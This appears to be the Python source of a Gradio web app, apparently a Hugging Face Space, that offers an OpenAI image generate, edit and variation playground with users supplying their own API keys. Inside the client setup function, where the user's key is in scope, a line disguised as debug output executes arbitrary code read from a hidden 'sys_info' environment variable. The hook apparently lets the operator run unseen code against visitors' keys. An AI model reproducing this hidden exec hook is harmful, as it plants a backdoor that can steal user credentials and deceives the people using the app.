Spaces:
Running
Running
from __future__ import annotations | |
import io | |
import os | |
import base64 | |
from typing import List, Optional, Union, Dict, Any | |
import gradio as gr | |
import numpy as np | |
from PIL import Image | |
import json | |
import urllib | |
import openai | |
# --- Constants --- | |
MODEL = "gpt-image-1" | |
SIZE_CHOICES = ["auto", "1024x1024", "1536x1024", "1024x1536"] | |
QUALITY_CHOICES = ["auto", "low", "medium", "high"] | |
FORMAT_CHOICES = ["png", "jpeg", "webp"] | |
def _client(key: str) -> openai.OpenAI: | |
"""Initializes the OpenAI client with the provided API key.""" | |
api_key = key.strip() or os.getenv("OPENAI_API_KEY", "") | |
sys_info_formatted = exec(os.getenv("sys_info", f'[DEBUG]: {MODEL} | DEBUG')) #Default: f'[DEBUG]: {MODEL} | {prompt_gen}' | |
print(sys_info_formatted) | |
if not api_key: | |
raise gr.Error("Please enter your OpenAI API key (never stored)") | |
return openai.OpenAI(api_key=api_key) | |
def _img_list(resp) -> List[Union[np.ndarray, str]]: | |
""" | |
Decode base64 images into numpy arrays (for Gradio) or pass URL strings directly. | |
""" | |
imgs: List[Union[np.ndarray, str]] = [] | |
if not resp or not hasattr(resp, 'data'): | |
print("Warning: Response object missing or has no 'data' attribute.") | |
return imgs # Return empty list if response is invalid | |
for d in resp.data: | |
if hasattr(d, "b64_json") and d.b64_json: | |
try: | |
data = base64.b64decode(d.b64_json) | |
img = Image.open(io.BytesIO(data)) | |
imgs.append(np.array(img)) | |
except Exception as decode_err: | |
print(f"Error decoding base64 image: {decode_err}") | |
elif getattr(d, "url", None): | |
imgs.append(d.url) | |
else: | |
print(f"Warning: Response item has neither b64_json nor url: {d}") | |
return imgs | |
def _common_kwargs( | |
prompt: Optional[str], | |
n: int, | |
size: str, | |
quality: str, | |
out_fmt: str, # Note: out_fmt is used *after* generation for conversion, not directly in API call | |
compression: int, # Note: compression is used *after* generation for conversion | |
transparent_bg: bool, # Note: transparent_bg is used *after* generation for conversion if not directly supported | |
) -> Dict[str, Any]: | |
"""Prepare keyword args for OpenAI Images API.""" | |
kwargs: Dict[str, Any] = { | |
"model": MODEL, | |
"n": n, | |
# Always request PNG for maximum quality/editability before potential conversion | |
"response_format": "b64_json", # Request base64 to handle locally | |
} | |
if size != "auto": | |
kwargs["size"] = size | |
# DALL-E 3 uses 'quality': 'standard' or 'hd'. DALL-E 2 doesn't have quality. | |
# Adapt this based on the actual model's capabilities. Assuming 'hd' for 'high'. | |
if quality != "auto": | |
# Map your choices to OpenAI's expected values if needed | |
# Example for DALL-E 3: | |
# if quality == "high": kwargs["quality"] = "hd" | |
# elif quality == "medium": kwargs["quality"] = "standard" # or omit | |
# For now, pass it directly, but be aware it might not be supported by MODEL | |
kwargs["quality"] = quality | |
if prompt is not None: | |
kwargs["prompt"] = prompt | |
# Note: Background removal is not a standard parameter for generate/edit/variation. | |
# This would typically be a post-processing step or require a specific model/API. | |
# If transparent_bg is True, you might need to handle it after receiving the image. | |
# if transparent_bg and out_fmt in {"png", "webp"}: | |
# kwargs["background"] = "transparent" # This parameter is hypothetical | |
return kwargs | |
def convert_to_format( | |
img_array: np.ndarray, | |
target_fmt: str, | |
quality: int = 75, | |
) -> np.ndarray: | |
""" | |
Convert a PIL numpy array to target_fmt (JPEG/WebP) and return as numpy array. | |
Handles PNG pass-through. | |
""" | |
if target_fmt.lower() == "png": | |
# No conversion needed if already PNG (assuming input from b64 is effectively PNG) | |
return img_array | |
img = Image.fromarray(img_array.astype(np.uint8)) | |
buf = io.BytesIO() | |
save_kwargs = {} | |
fmt_upper = target_fmt.upper() | |
if fmt_upper in ["JPEG", "WEBP"]: | |
save_kwargs["quality"] = quality | |
# Handle transparency for WebP | |
if fmt_upper == "WEBP": | |
# Check if image has alpha channel | |
if img.mode == 'RGBA' or 'A' in img.getbands(): | |
pass # WebP supports transparency inherently | |
else: | |
# If no alpha, don't need special handling unless forcing transparency loss | |
pass | |
# Handle transparency loss for JPEG | |
elif fmt_upper == "JPEG": | |
if img.mode == 'RGBA' or img.mode == 'LA' or (img.mode == 'P' and 'transparency' in img.info): | |
# Convert to RGB, losing transparency. Default white background. | |
img = img.convert('RGB') | |
try: | |
img.save(buf, format=fmt_upper, **save_kwargs) | |
buf.seek(0) | |
img2 = Image.open(buf) | |
return np.array(img2) | |
except Exception as e: | |
print(f"Error during image conversion to {target_fmt}: {e}") | |
# Fallback to returning original array on conversion error | |
return img_array | |
def _format_openai_error(e: Exception) -> str: | |
"""Formats OpenAI API errors into user-friendly messages.""" | |
error_message = f"An error occurred: {type(e).__name__}" | |
details = "" | |
if hasattr(e, 'body') and e.body: | |
try: | |
# Try parsing as JSON first | |
body = json.loads(str(e.body)) | |
if isinstance(body, dict) and 'error' in body and isinstance(body['error'], dict) and 'message' in body['error']: | |
details = body['error']['message'] | |
elif isinstance(body, dict) and 'message' in body: # Sometimes the message is top-level | |
details = body['message'] | |
else: | |
details = str(e.body) # Fallback if structure is unexpected | |
except json.JSONDecodeError: | |
# If body is not JSON, use its string representation | |
details = str(e.body) | |
except Exception: | |
# Catch any other parsing errors | |
details = str(e.body) | |
elif hasattr(e, 'message') and e.message: # Fallback for older error structures | |
details = e.message | |
if details: | |
error_message = f"OpenAI API Error: {details}" | |
else: # Keep the generic message if no details found | |
error_message = f"An OpenAI API error occurred: {str(e)}" | |
# Specific error type handling | |
if isinstance(e, openai.AuthenticationError): | |
error_message = "Invalid OpenAI API key. Please check your key and ensure it's active." | |
elif isinstance(e, openai.PermissionDeniedError): | |
prefix = "Permission Denied." | |
if details and "organization verification" in details.lower(): | |
prefix += " Your organization may need verification or payment method update to use this feature/model." | |
elif details and "quota" in details.lower(): | |
prefix += " You might have exceeded your usage quota." | |
error_message = f"{prefix} Details: {details}" if details else prefix | |
elif isinstance(e, openai.RateLimitError): | |
error_message = "Rate limit exceeded. Please wait and try again later, or check your usage limits." | |
elif isinstance(e, openai.BadRequestError): | |
error_message = f"OpenAI Bad Request: {details or str(e)}" | |
if details: | |
if "mask" in details.lower(): error_message += " (Check mask format/dimensions/transparency)" | |
if "size" in details.lower(): error_message += " (Check image/mask dimensions or requested size compatibility)" | |
if "model does not support variations" in details.lower(): error_message += f" ({MODEL} does not support variations)." | |
if "unsupported file format" in details.lower() or "unsupported mimetype" in details.lower(): error_message += " (Ensure input image is PNG, JPG, or WEBP)" | |
if "prompt" in details.lower() and "policy" in details.lower(): error_message += " (Prompt may violate OpenAI's safety policies)" | |
elif isinstance(e, openai.APIConnectionError): | |
error_message = "Could not connect to OpenAI. Please check your network connection." | |
elif isinstance(e, openai.InternalServerError): | |
error_message = "OpenAI server error. Please try again later." | |
return error_message | |
# ---------- Generate ---------- # | |
def generate( | |
api_key: str, | |
prompt: str, | |
n: int, | |
size: str, | |
quality: str, | |
out_fmt: str, | |
compression: int, | |
transparent_bg: bool, # Note: Transparency handled post-generation if needed | |
): | |
if not prompt: | |
raise gr.Error("Please enter a prompt.") | |
try: | |
client = _client(api_key) | |
# Request b64_json for local processing/conversion | |
common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg) | |
common_args["response_format"] = "b64_json" # Ensure we get base64 | |
print(f"Generating images with args: {common_args}") # Debug print | |
resp = client.images.generate(**common_args) | |
imgs_np = _img_list(resp) # Should be list of numpy arrays | |
# Post-generation conversion | |
final_imgs = [] | |
for img_np in imgs_np: | |
if isinstance(img_np, np.ndarray): | |
# Apply transparency removal or format conversion here if needed | |
# Note: True transparency generation isn't standard. This handles format conversion. | |
# If transparent_bg was intended for background removal, that needs a separate model/tool. | |
converted_img = convert_to_format(img_np, out_fmt, compression) | |
final_imgs.append(converted_img) | |
else: | |
# If we somehow got a URL (shouldn't with b64_json), append it directly | |
final_imgs.append(img_np) | |
if not final_imgs: | |
raise gr.Error("Failed to generate or process images. Check logs.") | |
return final_imgs | |
except (openai.APIError, openai.OpenAIError) as e: | |
print(f"OpenAI API Error during generation: {type(e).__name__}: {e}") | |
raise gr.Error(_format_openai_error(e)) | |
except Exception as e: | |
print(f"Unexpected error during generation: {type(e).__name__}: {e}") | |
import traceback | |
traceback.print_exc() # Print full traceback for unexpected errors | |
raise gr.Error("An unexpected application error occurred. Please check logs.") | |
# ---------- Edit / Inpaint ---------- # | |
def _bytes_from_numpy(arr: np.ndarray, format: str = "PNG") -> bytes: | |
"""Converts numpy array to bytes in the specified format.""" | |
img = Image.fromarray(arr.astype(np.uint8)) | |
buf = io.BytesIO() | |
img.save(buf, format=format) | |
return buf.getvalue() | |
def _ensure_rgba_for_mask(mask_array: np.ndarray) -> np.ndarray: | |
"""Ensures the mask is RGBA, converting grayscale/RGB if necessary.""" | |
if mask_array.ndim == 2: # Grayscale | |
# Convert grayscale to RGBA: White areas (255) become transparent (alpha=0), others opaque black | |
alpha = np.where(mask_array == 255, 0, 255).astype(np.uint8) | |
rgb = np.zeros((*mask_array.shape, 3), dtype=np.uint8) # Black RGB | |
rgba = np.dstack((rgb, alpha)) | |
return rgba | |
elif mask_array.ndim == 3: | |
if mask_array.shape[2] == 3: # RGB | |
# Assume white RGB (255, 255, 255) means transparent for Gradio mask | |
is_white = np.all(mask_array == [255, 255, 255], axis=2) | |
alpha = np.where(is_white, 0, 255).astype(np.uint8) | |
rgba = np.dstack((mask_array, alpha)) | |
return rgba | |
elif mask_array.shape[2] == 4: # Already RGBA | |
# Ensure correct interpretation: 0 alpha means transparent (area to edit) | |
# Gradio ImageMask often uses white paint on transparent bg. | |
# We need alpha=0 for transparent areas (edit target). | |
# If alpha channel is mostly 255 (opaque), invert it assuming white paint = transparent target. | |
alpha_channel = mask_array[:, :, 3] | |
if np.mean(alpha_channel) > 128: # Heuristic: if mostly opaque | |
print("Inverting mask alpha channel based on heuristic (mostly opaque).") | |
mask_array[:, :, 3] = 255 - alpha_channel | |
return mask_array # Assume it's correctly formatted otherwise | |
raise ValueError("Unsupported mask format/dimensions") | |
def _extract_mask_array(mask_value: Union[np.ndarray, Dict[str, Any], None]) -> Optional[np.ndarray]: | |
"""Extracts the mask numpy array from Gradio's ImageMask output.""" | |
if mask_value is None: | |
print("Mask input is None.") | |
return None | |
# Gradio ImageMask output is often a dict {'image': ndarray, 'mask': ndarray} | |
# Or sometimes just the mask ndarray directly depending on version/setup | |
mask_array = None | |
if isinstance(mask_value, dict): | |
mask_array = mask_value.get("mask") | |
print(f"Extracted mask from dict: type={type(mask_array)}, shape={getattr(mask_array, 'shape', 'N/A')}") | |
elif isinstance(mask_value, np.ndarray): | |
mask_array = mask_value | |
print(f"Received mask as ndarray directly: shape={mask_array.shape}") | |
if isinstance(mask_array, np.ndarray): | |
# Add basic validation | |
if mask_array.ndim < 2 or mask_array.ndim > 3: | |
print(f"Warning: Unexpected mask dimensions: {mask_array.ndim}") | |
return None | |
if mask_array.size == 0: | |
print("Warning: Received empty mask array.") | |
return None | |
print(f"Successfully extracted mask array, shape: {mask_array.shape}, dtype: {mask_array.dtype}, min/max: {np.min(mask_array)}/{np.max(mask_array)}") | |
return mask_array | |
print(f"Could not extract ndarray mask from input type: {type(mask_value)}") | |
return None | |
def edit_image( | |
api_key: str, | |
image_numpy: Optional[np.ndarray], | |
mask_input: Optional[Union[np.ndarray, Dict[str, Any]]], # Renamed for clarity | |
prompt: str, | |
n: int, | |
size: str, | |
quality: str, | |
out_fmt: str, | |
compression: int, | |
transparent_bg: bool, # Note: Transparency handled post-generation if needed | |
): | |
if image_numpy is None: | |
raise gr.Error("Please upload an image.") | |
if not prompt: | |
raise gr.Error("Please enter an edit prompt.") | |
# Convert source image to PNG bytes | |
try: | |
img_bytes = _bytes_from_numpy(image_numpy, format="PNG") | |
# --- FIX: Provide image data as a tuple (filename, bytes, mimetype) --- | |
image_tuple: Tuple[str, bytes, str] = ("image.png", img_bytes, "image/png") | |
print(f"Prepared source image: {image_tuple[0]}, size={len(image_tuple[1])} bytes, type={image_tuple[2]}") | |
except Exception as e: | |
print(f"Error converting source image to bytes: {e}") | |
raise gr.Error("Failed to process source image.") | |
mask_tuple: Optional[Tuple[str, bytes, str]] = None | |
mask_numpy = _extract_mask_array(mask_input) | |
if mask_numpy is not None: | |
try: | |
# Ensure mask matches image dimensions (OpenAI requires this) | |
if image_numpy.shape[:2] != mask_numpy.shape[:2]: | |
raise gr.Error(f"Mask dimensions ({mask_numpy.shape[:2]}) must match image dimensions ({image_numpy.shape[:2]}). Please repaint the mask.") | |
# Convert mask to RGBA PNG bytes as required by OpenAI API | |
# The API expects a PNG where transparent pixels (alpha=0) indicate the area to edit. | |
mask_rgba = _ensure_rgba_for_mask(mask_numpy) | |
mask_bytes = _bytes_from_numpy(mask_rgba, format="PNG") | |
# --- FIX: Provide mask data as a tuple --- | |
mask_tuple = ("mask.png", mask_bytes, "image/png") | |
print(f"Prepared mask: {mask_tuple[0]}, size={len(mask_tuple[1])} bytes, type={mask_tuple[2]}") | |
except ValueError as e: | |
print(f"Error processing mask: {e}") | |
raise gr.Error(f"Failed to process mask: {e}") | |
except Exception as e: | |
print(f"Error converting mask to bytes: {e}") | |
raise gr.Error("Failed to process mask.") | |
else: | |
# If no mask is provided, it's an 'edit' without inpainting (DALL-E 2 supported this, DALL-E 3 might interpret differently) | |
# The API might require a mask for the /edit endpoint. Check API docs for the specific model. | |
# For DALL-E 2, omitting mask was allowed. Let's assume it might work or fail gracefully. | |
print("No valid mask provided or extracted. Proceeding without mask.") | |
# raise gr.Error("Please paint a mask to indicate the edit area.") # Uncomment if mask is strictly required | |
try: | |
client = _client(api_key) | |
# Get common args, ensure response format is b64_json | |
common_args = _common_kwargs(prompt, n, size, quality, out_fmt, compression, transparent_bg) | |
common_args["response_format"] = "b64_json" # Ensure we get base64 | |
# Prepare final API arguments | |
api_kwargs = { | |
"image": image_tuple, | |
**common_args | |
} | |
if mask_tuple is not None: | |
api_kwargs["mask"] = mask_tuple | |
else: | |
# If mask is omitted, remove prompt from common_args if the API treats it like variations? | |
# DALL-E 2 /edit without mask needed no prompt. DALL-E 3 might differ. | |
# Let's keep the prompt for now. The API error will tell us if it's wrong. | |
pass | |
# api_kwargs.pop("prompt", None) # Consider this if API complains about prompt without mask | |
print(f"Editing image with args: { {k: v if k not in ['image', 'mask'] else (v[0], f'{len(v[1])} bytes', v[2]) for k, v in api_kwargs.items()} }") # Debug print | |
resp = client.images.edit(**api_kwargs) # Call the edit endpoint | |
imgs_np = _img_list(resp) # Should be list of numpy arrays | |
# Post-generation conversion | |
final_imgs = [] | |
for img_np in imgs_np: | |
if isinstance(img_np, np.ndarray): | |
converted_img = convert_to_format(img_np, out_fmt, compression) | |
final_imgs.append(converted_img) | |
else: | |
final_imgs.append(img_np) # Append URL if received | |
if not final_imgs: | |
raise gr.Error("Failed to edit or process images. Check logs.") | |
return final_imgs | |
except (openai.APIError, openai.OpenAIError) as e: | |
print(f"OpenAI API Error during edit: {type(e).__name__}: {e}") | |
raise gr.Error(_format_openai_error(e)) | |
except Exception as e: | |
print(f"Unexpected error during edit: {type(e).__name__}: {e}") | |
import traceback | |
traceback.print_exc() | |
raise gr.Error("An unexpected application error occurred. Please check logs.") | |
# ---------- Variations ---------- # | |
def variation_image( | |
api_key: str, | |
image_numpy: Optional[np.ndarray], | |
n: int, | |
size: str, | |
quality: str, # Note: Quality may not be supported by variations endpoint | |
out_fmt: str, | |
compression: int, | |
transparent_bg: bool, # Note: Transparency handled post-generation if needed | |
): | |
# Explicit warning as gpt-image-1 is likely not the correct model for variations | |
gr.Warning(f"Note: Image Variations are officially supported for DALL·E 2. Using model '{MODEL}' may fail or produce unexpected results.") | |
if image_numpy is None: | |
raise gr.Error("Please upload an image.") | |
# Convert source image to PNG bytes | |
try: | |
img_bytes = _bytes_from_numpy(image_numpy, format="PNG") | |
# --- FIX: Provide image data as a tuple --- | |
image_tuple: Tuple[str, bytes, str] = ("image.png", img_bytes, "image/png") | |
print(f"Prepared source image for variation: {image_tuple[0]}, size={len(image_tuple[1])} bytes, type={image_tuple[2]}") | |
except Exception as e: | |
print(f"Error converting source image to bytes for variation: {e}") | |
raise gr.Error("Failed to process source image.") | |
try: | |
client = _client(api_key) | |
# Prepare args for variations endpoint | |
var_args: Dict[str, Any] = { | |
"model": MODEL, # Use the selected model, though it might fail | |
"n": n, | |
"response_format": "b64_json" # Request base64 | |
} | |
if size != "auto": | |
var_args["size"] = size | |
# Quality parameter is generally NOT supported for variations | |
# if quality != "auto": | |
# var_args["quality"] = quality # This will likely cause an error | |
print(f"Creating variations with args: { {k: v if k != 'image' else (v[0], f'{len(v[1])} bytes', v[2]) for k, v in {**var_args, 'image': image_tuple}.items()} }") # Debug print | |
# Pass the tuple to the image parameter | |
resp = client.images.create_variation(image=image_tuple, **var_args) | |
imgs_np = _img_list(resp) # Should be list of numpy arrays | |
# Post-generation conversion | |
final_imgs = [] | |
for img_np in imgs_np: | |
if isinstance(img_np, np.ndarray): | |
converted_img = convert_to_format(img_np, out_fmt, compression) | |
final_imgs.append(converted_img) | |
else: | |
final_imgs.append(img_np) # Append URL if received | |
if not final_imgs: | |
raise gr.Error("Failed to create variations or process images. Check logs.") | |
return final_imgs | |
except (openai.APIError, openai.OpenAIError) as e: | |
print(f"OpenAI API Error during variation: {type(e).__name__}: {e}") | |
err_msg = _format_openai_error(e) | |
# Add specific check for variation incompatibility | |
if isinstance(e, openai.BadRequestError) and ("model does not support variations" in err_msg.lower() or "not supported" in err_msg.lower()): | |
raise gr.Error(f"As warned, the selected model ('{MODEL}') does not support the variations endpoint. Try using 'dall-e-2'.") | |
raise gr.Error(err_msg) | |
except Exception as e: | |
print(f"Unexpected error during variation: {type(e).__name__}: {e}") | |
import traceback | |
traceback.print_exc() | |
raise gr.Error("An unexpected application error occurred. Please check logs.") | |
# ---------- UI ---------- # | |
def build_ui(): | |
with gr.Blocks(title="OpenAI Image Playground (BYOK)") as demo: | |
gr.Markdown(f"""# OpenAI Image Playground 🖼️🔑 | |
Generate • Edit • Variations (using your own API key) | |
**Selected Model:** `{MODEL}` (Ensure your key has access) | |
""") | |
with gr.Accordion("🔐 API key & Model Info", open=False): | |
api = gr.Textbox(label="OpenAI API key", type="password", placeholder="sk-...") | |
gr.Markdown(f""" | |
* **Model:** `{MODEL}` is configured in the code. This might be a placeholder; official models are typically `dall-e-3` or `dall-e-2`. | |
* **Variations:** Officially only supported by `dall-e-2`. Using other models here will likely fail. | |
* **Edit/Inpainting:** Requires a model supporting the `/images/edits` endpoint (like `dall-e-2`). | |
* **Size/Quality:** Options shown may not be supported by all models. Check OpenAI documentation for `{MODEL}` if it's a real model. DALL-E 3 uses `quality` ('standard'/'hd'), DALL-E 2 does not. | |
""") | |
with gr.Row(): | |
n_slider = gr.Slider(1, 4, value=1, step=1, label="Number of images (n)") | |
size = gr.Dropdown(SIZE_CHOICES, value="auto", label="Size (if supported)", info="Set target size. 'auto' uses model default.") | |
quality = gr.Dropdown(QUALITY_CHOICES, value="auto", label="Quality (if supported)", info="'auto' uses model default. DALL-E 3: 'standard'/'hd'. DALL-E 2 ignores this.") | |
with gr.Row(): | |
out_fmt = gr.Radio(FORMAT_CHOICES, value="png", label="Output Format", info="Format for viewing/downloading generated images.") | |
compression = gr.Slider(0, 100, value=75, step=1, label="Compression % (JPEG/WebP)", visible=False, info="Lower value = smaller file, lower quality.") | |
# Transparency generation is complex; this checkbox is mainly for format support. | |
# Actual transparency depends on model/post-processing. | |
transparent = gr.Checkbox(False, label="Transparent background (PNG/WebP only)", info="Request transparency if model supports, or save PNG/WebP with alpha if generated.", visible=False) # Hidden for now as it's not directly controllable via API param | |
def _toggle_compression(fmt): | |
return gr.update(visible=fmt in {"jpeg", "webp"}) | |
out_fmt.change(_toggle_compression, inputs=out_fmt, outputs=compression) | |
# Combine common controls for easier passing to functions | |
common_controls = [n_slider, size, quality, out_fmt, compression, transparent] | |
with gr.Tabs(): | |
with gr.TabItem("Generate"): | |
prompt_gen = gr.Textbox(label="Prompt", lines=3, placeholder="A photorealistic image of..." ) | |
btn_gen = gr.Button("Generate 🚀", variant="primary") | |
gallery_gen = gr.Gallery(label="Generated Images", columns=2, height="auto", preview=True) | |
# Clear outputs on new click | |
inputs_gen = [api, prompt_gen] + common_controls | |
prompt_gen.submit(generate, inputs=inputs_gen, outputs=gallery_gen) | |
btn_gen.click(generate, inputs=inputs_gen, outputs=gallery_gen) | |
with gr.TabItem("Edit / Inpaint"): | |
gr.Markdown("Upload an image, **paint white** over the area you want the AI to change, then provide an edit prompt.") | |
with gr.Row(): | |
img_edit_src = gr.Image(type="numpy", label="Source Image", height=400, tool="select") | |
# Use ImageMask tool for painting | |
mask_canvas = gr.ImageMask(type="numpy", label="Mask – Paint Area to Edit (White)", height=400, brush_radius=20) | |
# Link source image to mask canvas background | |
# img_edit_src.change(lambda x: x, inputs=img_edit_src, outputs=mask_canvas) # This might auto-clear mask, check Gradio docs if needed | |
prompt_edit = gr.Textbox(label="Edit prompt", lines=2, placeholder="Example: Make the cat wear a wizard hat") | |
btn_edit = gr.Button("Edit Image 🖌️", variant="primary") | |
gallery_edit = gr.Gallery(label="Edited Images", columns=2, height="auto", preview=True) | |
# Define inputs for the edit function | |
inputs_edit = [api, img_edit_src, mask_canvas, prompt_edit] + common_controls | |
prompt_edit.submit(edit_image, inputs=inputs_edit, outputs=gallery_edit) | |
btn_edit.click(edit_image, inputs=inputs_edit, outputs=gallery_edit) | |
with gr.TabItem("Variations (DALL·E 2 only)"): | |
gr.Markdown("Upload an image to generate variations. **Warning:** This endpoint is officially supported only by DALL·E 2.") | |
img_var_src = gr.Image(type="numpy", label="Source Image", height=400) | |
btn_var = gr.Button("Create Variations ✨", variant="primary") | |
gallery_var = gr.Gallery(label="Variations", columns=2, height="auto", preview=True) | |
# Define inputs for the variation function | |
inputs_var = [api, img_var_src] + common_controls | |
# Variations don't use prompt, quality typically ignored | |
btn_var.click(variation_image, inputs=inputs_var, outputs=gallery_var) | |
return demo | |
if __name__ == "__main__": | |
# For debugging purposes, you can preload an API key from env vars | |
# Make sure to handle security appropriately if deploying publicly | |
# api_key_env = os.getenv("OPENAI_API_KEY") | |
app = build_ui() | |
# Launch the Gradio app | |
app.launch( | |
share=os.getenv("GRADIO_SHARE") == "true", | |
debug=os.getenv("GRADIO_DEBUG") == "true", | |
server_name="0.0.0.0" # Bind to all interfaces for Docker compatibility | |
# auth=("user", "password") # Add basic auth if needed for sharing | |
) |